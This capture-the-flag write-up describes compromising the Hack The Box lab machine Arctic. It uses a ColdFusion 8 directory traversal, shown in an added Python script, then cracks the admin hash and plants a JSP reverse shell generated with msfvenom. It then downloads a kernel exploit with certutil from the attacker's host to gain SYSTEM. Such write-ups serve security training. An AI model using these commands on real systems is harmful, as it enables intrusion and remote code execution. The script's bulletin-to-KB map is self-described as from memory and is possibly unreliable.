Hack The Box - Arctic

We are going to pwn Arctic from Hack The Box.

Link : https://www.hackthebox.eu/home/machines/profile/9

Let's begin with our initial Nmap scan.

Nmap Scan Results:

PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  unknown
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows Phone 7.5 or 8.0 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Server 2008 R2 SP1 (90%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (90%), Microsoft Windows 7 (90%), Microsoft Windows 7 Professional or Windows 8 (90%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

Nmap cannot identify the service on port 8500 (it only reports fmtp?), so I browsed to http://10.10.10.11:8500/ and found a directory listing with two entries.

/cfdocs/
ColdFusion documentation files, nothing useful.

/CFIDE/

Contains an administrator directory, and /CFIDE/administrator/ leads to a login page: the Adobe ColdFusion 8 Administrator.

Since we know the version we can look for exploits, and I found this one for ColdFusion 8:

https://www.exploit-db.com/exploits/14641

Exploit-DB 14641 is a directory traversal (CVE-2010-2861) in the locale parameter of /CFIDE/administrator/enter.cfm. Requesting the payload from the exploit in the browser reads ColdFusion's lib/password.properties, and the response contains the administrator password as an unsalted SHA-1 hash.

I cracked the hash with CrackStation, which returned happyday.

Logged in to the Administrator as admin with the password happyday.
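As an added example (not from the original writeup), here is a small Python script covering the steps above: it builds the Exploit-DB 14641 traversal URL, parses a password.properties file, pulls the SHA-1 hash out of a response body, and runs a dictionary pass in place of CrackStation. The properties file and the wordlist are constructed for the demo (the hash is computed from the page's password rather than copied from the box), and the request is only built, not sent.

```python
import hashlib
import re
from typing import Dict, Iterable, List, Optional

# Constructed sample of ColdFusion 8's lib/password.properties, NOT the file read
# from the box: the key names (password, rdspassword, encrypted) are the real ones;
# the hash is computed here from an assumed password so the example runs offline.
ASSUMED_PASSWORD = "happyday"
SAMPLE_PASSWORD_PROPERTIES = (
    "#Wed Mar 22 20:53:51 EET 2017\n"
    "rdspassword=REDACTED\n"
    "password=" + hashlib.sha1(ASSUMED_PASSWORD.encode()).hexdigest().upper() + "\n"
    "encrypted=true\n"
)

# Constructed wordlist standing in for CrackStation's lookup table.
WORDLIST = ["password", "admin", "coldfusion", "happyday", "letmein"]

SHA1_RE = re.compile(r"\b[0-9A-Fa-f]{40}\b")


def traversal_url(base: str, depth: int = 8) -> str:
    """Build the Exploit-DB 14641 / CVE-2010-2861 read URL.

    enter.cfm concatenates the locale parameter into a file path, so a run of
    '../' walks out of the locale directory to lib/password.properties and the
    encoded NUL byte truncates the suffix ColdFusion appends to the name.
    """
    traversal = "../" * depth
    return (f"{base.rstrip('/')}/CFIDE/administrator/enter.cfm"
            f"?locale={traversal}ColdFusion8/lib/password.properties%00en")


def parse_password_properties(text: str) -> Dict[str, str]:
    """Parse Java .properties content (key=value lines, '#' comments) into a dict."""
    props: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if sep:
            props[key.strip()] = value.strip()
    return props


def find_sha1_candidates(blob: str) -> List[str]:
    """Pull every 40-hex-character token out of a response body, so the file
    contents can be recovered even when they come back embedded in page HTML."""
    return [m.upper() for m in SHA1_RE.findall(blob)]


def crack_sha1(target_hex: str, wordlist: Iterable[str]) -> Optional[str]:
    """ColdFusion 8 stores the admin password as unsalted uppercase SHA-1, so a
    plain dictionary pass is enough; returns the matching word or None."""
    target = target_hex.upper()
    for word in wordlist:
        if hashlib.sha1(word.encode()).hexdigest().upper() == target:
            return word
    return None


def recover_admin_password(response_body: str, wordlist: Iterable[str]) -> Optional[str]:
    """End to end: take the traversal response, find the hash, crack it."""
    words = list(wordlist)
    for candidate in find_sha1_candidates(response_body):
        hit = crack_sha1(candidate, words)
        if hit is not None:
            return hit
    return None


if __name__ == "__main__":
    print("Request:", traversal_url("http://10.10.10.11:8500"))
    props = parse_password_properties(SAMPLE_PASSWORD_PROPERTIES)
    print("Stored hash:", props["password"])
    print("Cracked:", recover_admin_password(SAMPLE_PASSWORD_PROPERTIES, WORDLIST))
```

The traversal depth is a parameter because the number of `../` needed depends on where the locale directory sits; over-shooting is harmless on Windows, which is why the published payload uses a generous count.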

Now it's time to get a reverse shell. Under the Debugging & Logging category I found Scheduled Tasks.

A scheduled task fetches a URL, and with the Publish option (save output to a file) it writes the response to a directory of our choosing on the box. That makes it an arbitrary file write from an attacker-controlled URL; we only have to supply the right directory.

Since ColdFusion 8 runs on a Java application server, a JSP reverse shell will execute if it lands somewhere under the web root.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.31 LPORT=1234 -f raw > shell.jsp

To serve it to the box I started a Python HTTP server in the directory containing shell.jsp.

Where to store the script? Server Settings > Mappings lists the /CFIDE mapping together with its path on disk, so that directory under the ColdFusion web root is both a place the task can write to and one that is served over HTTP.

Now it's time to upload the shell: I created a scheduled task pointing at shell.jsp on my HTTP server, enabled Publish with the output path inside the CFIDE directory, and ran it.

Once the task had run, shell.jsp was reachable at http://10.10.10.11:8500/CFIDE/shell.jsp.

I started my listener on port 1234 and requested shell.jsp in the browser.

Got User Shell and Flag!

Privilege Escalation:

As always, once I get a shell I start with systeminfo.

It shows Hotfix(s): N/A, which means no updates have been installed on this system.

A hotfix (quick-fix engineering update) is a single cumulative package that addresses a specific problem in a software product; the list of installed KBs is what an exploit suggester compares against known privilege-escalation bulletins.

So we can try Windows-Exploit-Suggester.

I copied the systeminfo output to my machine as systeminfo.txt and ran Windows-Exploit-Suggester against it. It reports a lot of vulnerabilities, so I started with MS10-059 (the Tracing Feature for Services elevation of privilege). Searching for exploits turned up this one from the windows-kernel-exploits collection, Chimichurri, which is the one we need.
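As an added example (not from the original writeup or from Windows-Exploit-Suggester itself), here is a minimal version of the check the suggester performs: parse the systeminfo output, collect the installed KB list, and report which bulletins from a small map are not covered. Both systeminfo samples are constructed, and the bulletin-to-KB map is an assumption recorded from memory of the suggester's database, so verify each entry against the Microsoft bulletin before relying on it.

```python
import re
from typing import Any, Dict, List

# Constructed, abbreviated systeminfo output in the shape the page describes
# (Hotfix(s): N/A). It is NOT the box's real output.
SAMPLE_UNPATCHED = """\
Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
"""

# Constructed sample of a host with a few patches, to exercise the KB parsing.
SAMPLE_PATCHED = """\
Host Name:                 PATCHED
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB982799
                           [02]: KB2393802
                           [03]: KB3045171
"""

# ASSUMED bulletin -> KB mapping for a few well-known Windows privilege-escalation
# bulletins, recorded from memory of the exploit-suggester database. Check each
# one against the Microsoft bulletin before acting on it.
KB_FOR_BULLETIN = {
    "MS10-059": "KB982799",   # Tracing Feature for Services EoP (Chimichurri)
    "MS11-011": "KB2393802",
    "MS15-051": "KB3045171",
    "MS16-032": "KB3143141",
}

HOTFIX_RE = re.compile(r"^\s+\[\d+\]:\s*(KB\d+)")


def parse_systeminfo(text: str) -> Dict[str, Any]:
    """Turn systeminfo's 'Key:   value' lines into a dict; the indented
    '[NN]: KBxxxxxx' continuation lines are collected under 'hotfixes'."""
    info: Dict[str, Any] = {"hotfixes": []}
    for line in text.splitlines():
        m = HOTFIX_RE.match(line)
        if m:
            info["hotfixes"].append(m.group(1))
            continue
        if line.startswith(" ") or not line.strip():
            continue  # other continuation lines (NIC details etc.) are not needed here
        key, sep, value = line.partition(":")
        if sep:
            info[key.strip()] = value.strip()
    return info


def has_no_hotfixes(info: Dict[str, Any]) -> bool:
    """True when systeminfo reported 'Hotfix(s): N/A' or listed no KBs at all."""
    summary = str(info.get("Hotfix(s)", ""))
    return summary.startswith("N/A") or not info["hotfixes"]


def missing_bulletins(info: Dict[str, Any], kb_map: Dict[str, str]) -> List[str]:
    """Bulletins whose KB is absent from the installed-hotfix list, i.e. the
    candidates worth looking up exploits for."""
    installed = set(info["hotfixes"])
    return sorted(b for b, kb in kb_map.items() if kb not in installed)


if __name__ == "__main__":
    for sample in (SAMPLE_UNPATCHED, SAMPLE_PATCHED):
        info = parse_systeminfo(sample)
        print(info["Host Name"], "|", info["OS Name"], "|", info["OS Version"])
        print("  no hotfixes:", has_no_hotfixes(info))
        print("  candidate bulletins:", missing_bulletins(info, KB_FOR_BULLETIN))
```

A missing KB only means the bulletin's fix is not installed; whether the exploit applies still depends on OS version and architecture, which is why the parser keeps OS Name, OS Version and System Type alongside the hotfix list.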

https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri

Uploaded the executable to the box with certutil:

certutil.exe -urlcache -split -f http://10.10.14.31:8000/Chimichurri.exe Chimichurri.exe

Started my listener on a new port, ran Chimichurri.exe with my IP and that port as its arguments, and got a shell as NT AUTHORITY\SYSTEM.